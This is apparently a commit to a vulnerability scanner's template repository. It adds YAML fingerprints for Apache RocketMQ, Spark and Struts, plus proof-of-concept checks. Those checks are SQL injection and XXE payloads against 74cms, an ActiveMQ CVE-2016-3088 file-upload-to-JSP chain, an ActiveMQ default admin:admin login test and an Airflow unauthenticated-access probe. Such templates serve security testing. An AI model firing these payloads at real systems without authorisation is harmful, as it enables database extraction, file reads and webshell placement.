上传poc与指纹

Author: Jarcis-cy

finger/Apache-RocketMQ.yml

@@ -0,0 +1,30 @@
+name: fingerprint-yaml-Apache-RocketMQ
+manual: false
+detail:
+    fingerprint:
+        name: Apache-RocketMQ
+    fofa: 'body="title>RocketMq" || header="X-Application-Context: rocketmq-console" || title="RocketMq-console-ng"'
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("title>RocketMq")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: 'response.raw_header.bcontains(bytes("X-Application-Context: rocketmq-console"))'
+    r2:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.title_string == 'RocketMq-console-ng'
+expression: r0() || r1() || r2()

finger/Apache-Spark.yml

@@ -0,0 +1,38 @@
+name: fingerprint-yaml-Apache-Spark
+manual: false
+detail:
+    fingerprint:
+        name: Apache-Spark
+    version: '{{version}}'
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains('/static/spark-logo') || response.title_string.contains('Spark Worker at') || response.body_string.contains('serverSparkVersion')
+    v0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains('serverSparkVersion')
+        output:
+            search: |
+                '"serverSparkVersion" : "(?P<version>[0-9\\.]+)"'.submatch(response.body_string)
+            version: search['version']
+    v1:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains('class="version"')
+        output:
+            search: |
+                '<span class="version" style="margin-right: 15px;">(?P<version>[0-9\\.]+)</span>'.submatch(response.body_string)
+            version: search['version']
+expression: r0() && (v0() || v1() || true)

finger/Apache-Struts.yml

@@ -0,0 +1,30 @@
+name: fingerprint-yaml-Apache-Struts
+manual: false
+detail:
+    fingerprint:
+        name: Apache-Struts
+    fofa: body="org.apache.struts2" || body="org.apache.struts." || body="content=\"Struts2 Showcase for Apache Struts Project\""
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("org.apache.struts2")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("org.apache.struts.")
+    r2:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains('content="Struts2 Showcase for Apache Struts Project"')
+expression: r0() || r1() || r2()

finger/Apache-Struts2.yml

@@ -0,0 +1,55 @@
+name: fingerprint-yaml-Apache-Struts2
+manual: false
+detail:
+    fingerprint:
+        name: Apache-Struts2
+    fofa: body="struts problem report" && body="there is no action mapped for namespace" && body="no result defined for action and result input" && body="<a href=(.*\\.action(.*</a>" && body="<form id=(.*\\.action(.*" && body="<a href=(.*\\.do(.*</a>" && body="(.*\\.action" && body="(.*\\.do" || header="jsessionid" || body="struts problem report" || body="there is no action mapped for namespace" || body="no result defined for action and result input"
+transport: http
+set:
+    404Path: get404Path()
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("struts problem report") && response.body_string.contains("there is no action mapped for namespace") && response.body_string.contains("no result defined for action and result input") && response.body_string.contains("<a href=(.*\\.action(.*</a>") && response.body_string.contains("<form id=(.*\\.action(.*") && response.body_string.contains("<a href=(.*\\.do(.*</a>") && response.body_string.contains("(.*\\.action") && response.body_string.contains("(.*\\.do")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.raw_header.bcontains(bytes("jsessionid"))
+    r2:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("struts problem report")
+    r3:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("there is no action mapped for namespace")
+    r4:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: true
+        expression: response.body_string.contains("no result defined for action and result input")
+    r5:
+        request:
+            method: GET
+            path: /{{404Path}}
+        expression: response.body_string.contains('Struts Problem Report') ||
+            response.body_string.contains('org.apache.struts') ||
+            response.body_string.contains('struts.devMode') ||
+            response.body_string.contains('struts-tags') ||
+            response.body_string.contains('There is no Action mapped for namespace')
+expression: r0() || r1() || r2() || r3() || r4() || r5()

poc/74cms-sqli-1.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-74cms-sqli-1
+manual: true
+transport: http
+set:
+    rand: randomInt(200000000, 210000000)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
+            headers:
+                Content-Type: text/xml
+            body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
+            follow_redirects: false
+        expression: response.body.bcontains(bytes(md5(string(rand))))
+expression: r0()
+detail:
+    author: betta(https://github.com/betta-cyber)
+    links:
+        - https://www.uedbox.com/post/29340

poc/74cms-sqli-2.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-74cms-sqli-2
+manual: true
+transport: http
+set:
+    rand: randomInt(200000000, 210000000)
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
+        expression: response.body.bcontains(bytes(md5(string(rand))))
+expression: r0()
+detail:
+    author: rexus
+    links:
+        - https://www.uedbox.com/post/30019/

poc/74cms-sqli.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-74cms-sqli
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
+        expression: response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
+expression: r0()
+detail:
+    author: jinqi
+    links:
+        - https://www.t00ls.net/articles-54436.html

poc/activemq-cve-2016-3088.yml

@@ -0,0 +1,48 @@
+name: poc-yaml-activemq-cve-2016-3088
+manual: true
+transport: http
+set:
+    filename: randomLowercase(6)
+    fileContent: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: PUT
+            path: /fileserver/{{filename}}.txt
+            headers:
+                Content-Type: application/x-www-form-urlencoded
+            body: |
+                {{fileContent}}
+        expression: response.status == 204
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /admin/test/index.jsp
+            follow_redirects: false
+        expression: response.status == 200
+        output:
+            search: '"activemq.home=(?P<home>.*?),".bsubmatch(response.body)'
+            home: search["home"]
+    r2:
+        request:
+            cache: true
+            method: MOVE
+            path: /fileserver/{{filename}}.txt
+            headers:
+                Destination: file://{{home}}/webapps/api/{{filename}}.jsp
+            follow_redirects: false
+        expression: response.status == 204
+    r3:
+        request:
+            cache: true
+            method: GET
+            path: /api/{{filename}}.jsp
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
+expression: r0() && r1() && r2() && r3()
+detail:
+    author: j4ckzh0u(https://github.com/j4ckzh0u)
+    links:
+        - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088

poc/activemq-default-password.yml

@@ -0,0 +1,23 @@
+name: poc-yaml-activemq-default-password
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /admin/
+        expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /admin/
+            headers:
+                Authorization: Basic YWRtaW46YWRtaW4=
+        expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
+expression: r0() && r1()
+detail:
+    author: pa55w0rd(www.pa55w0rd.online/)
+    links:
+        - https://blog.csdn.net/ge00111/article/details/72765210

poc/airflow-unauth.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-airflow-unauth
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /admin/
+        expression: response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
+expression: r0()
+detail:
+    author: pa55w0rd(www.pa55w0rd.online/)
+    links:
+        - http://airflow.apache.org/